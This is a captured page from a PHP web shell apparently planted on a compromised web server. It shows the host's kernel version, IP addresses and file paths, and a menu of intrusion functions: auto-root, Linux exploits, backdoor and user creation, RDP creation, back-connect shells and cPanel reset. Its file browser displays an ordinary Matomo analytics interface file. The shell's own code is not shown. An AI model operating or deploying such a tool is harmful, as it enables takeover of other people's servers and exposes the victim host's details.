Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.117.192.205
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
core /
Db /
[ HOME SHELL ]
Name
Size
Permission
Action
Adapter
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
Adapter.php
4.74
KB
-rw-r--r--
AdapterInterface.php
1.31
KB
-rw-r--r--
BatchInsert.php
11.24
KB
-rw-r--r--
Schema.php
4.78
KB
-rw-r--r--
SchemaInterface.php
2.45
KB
-rw-r--r--
Settings.php
872
B
-rw-r--r--
TransactionLevel.php
2.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SchemaInterface.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Db; /** * Database schema interface */ interface SchemaInterface { /** * Get the SQL to create a specific Piwik table * * @param string $tableName * @return string SQL */ public function getTableCreateSql($tableName); /** * Get the SQL to create Piwik tables * * @return array array of strings containing SQL */ public function getTablesCreateSql(); /** * Creates a new table in the database. * * @param string $nameWithoutPrefix The name of the table without any piwik prefix. * @param string $createDefinition The table create definition */ public function createTable($nameWithoutPrefix, $createDefinition); /** * Create database * * @param string $dbName Name of the database to create */ public function createDatabase($dbName = null); /** * Drop database */ public function dropDatabase(); /** * Create all tables */ public function createTables(); /** * Creates an entry in the User table for the "anonymous" user. */ public function createAnonymousUser(); /** * Records the Matomo version a user used when installing this Matomo for the first time */ public function recordInstallVersion(); /** * Returns which Matomo version was used to install this Matomo for the first time. */ public function getInstallVersion(); /** * Truncate all tables */ public function truncateAllTables(); /** * Names of all the prefixed tables in piwik * Doesn't use the DB * * @return array Table names */ public function getTablesNames(); /** * Get list of tables installed * * @param bool $forceReload Invalidate cache * @return array installed Tables */ public function getTablesInstalled($forceReload = true); /** * Get list of installed columns in a table * * @param string $tableName The name of a table. * * @return array Installed columns indexed by the column name. */ public function getTableColumns($tableName); /** * Checks whether any table exists * * @return bool True if tables exist; false otherwise */ public function hasTables(); }
Close